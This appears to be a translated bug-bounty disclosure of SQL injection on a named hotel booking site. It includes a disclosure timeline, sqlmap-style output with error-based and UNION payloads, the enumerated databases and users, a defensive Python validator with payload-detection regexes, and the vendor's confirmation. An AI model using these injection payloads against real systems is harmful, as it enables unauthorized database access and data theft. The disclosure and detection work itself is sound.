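2014-02-28: Details reported to the vendor; awaiting vendor response
2014-03-06: Vendor confirmed; details disclosed to the vendor only
2014-03-16: Details disclosed to core white hats and experts in the relevant field
2014-03-26: Details disclosed to regular white hats
2014-04-05: Details disclosed to intern white hats
2014-04-14: Details disclosed to the public
I think this is a duplicate.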
http://www.bestay.com.cn/Web/Chain/HotelComment.aspx?unitId=8097&cityId=
The unitId parameter is not properly filtered.
Place: GET
Parameter: unitId
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: unitId=8097' AND 1642=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(104)+CHAR(119)+CHAR(113)+(SELECT (CASE WHEN (1642=1642) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(113)+CHAR(113))) AND 'rIgJ'='rIgJ&cityId=1

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: unitId=8097' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(104)+CHAR(119)+CHAR(113)+CHAR(78)+CHAR(80)+CHAR(70)+CHAR(73)+CHAR(114)+CHAR(111)+CHAR(76)+CHAR(87)+CHAR(103)+CHAR(112)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(113)+CHAR(113),NULL,NULL,NULL-- &cityId=1

web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [5]:
[*] JJWEB
[*] master
[*] model
[*] msdb
[*] tempdb

database management system users [2]:
[*] sa
[*] WEB-DB-WEB
Database: JJWEB
[81 tables]
Filter the input!
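What that filtering means for this endpoint, as an added example (not code from the report or the vendor): treat unitId and cityId as integers, flag anything else, and label values that match the shapes of the two payloads quoted above. The host name, the sample URLs and the assumption that both parameters are integer ids are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: both query parameters of HotelComment.aspx are integer ids.
INT_PARAMS = ("unitId", "cityId")
INT_RE = re.compile(r"\d{1,10}")

# Shapes taken from the error-based and UNION payloads quoted in the report.
SIGNATURES = [
    ("error-based CONVERT", re.compile(r"convert\s*\(\s*int\s*,", re.I)),
    ("UNION query", re.compile(r"union\s+(all\s+)?select", re.I)),
    ("CHAR() concatenation", re.compile(r"(char\(\d+\)[\s+]*){3,}", re.I)),
]

def check_request(url):
    """Return [(param, [labels])] for one request URL; empty list means clean."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/hotelcomment.aspx"):
        return []
    findings = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name not in INT_PARAMS:
            continue
        # An empty value (as in the URL on the page) or a plain integer passes.
        if value == "" or INT_RE.fullmatch(value):
            continue
        hits = [label for label, rx in SIGNATURES if rx.search(value)]
        findings.append((name, hits or ["non-integer value"]))
    return findings

# Constructed request URLs (placeholder host, shortened payload shapes).
BASE = "http://hotel.example/Web/Chain/HotelComment.aspx?"
SAMPLES = [
    BASE + "unitId=8097&cityId=",
    BASE + "unitId=8097%27%20AND%201642%3DCONVERT(INT%2C(SELECT%20"
           "CHAR(113)%2BCHAR(118)%2BCHAR(104)))%20AND%20%27a%27%3D%27a&cityId=1",
    BASE + "unitId=8097%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20&cityId=1",
    BASE + "unitId=abc&cityId=1",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(check_request(url) or "clean", "<-", url[len(BASE):][:60])
```

The same integer check belongs in the request handler before the value is used, and the query itself should bind unitId as a typed parameter rather than concatenating it into the SQL text.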
Severity: High
Vulnerability Rank: 15
Confirmed at: 2014-03-06 10:23
Confirmed, fix in progress, thank you.
None yet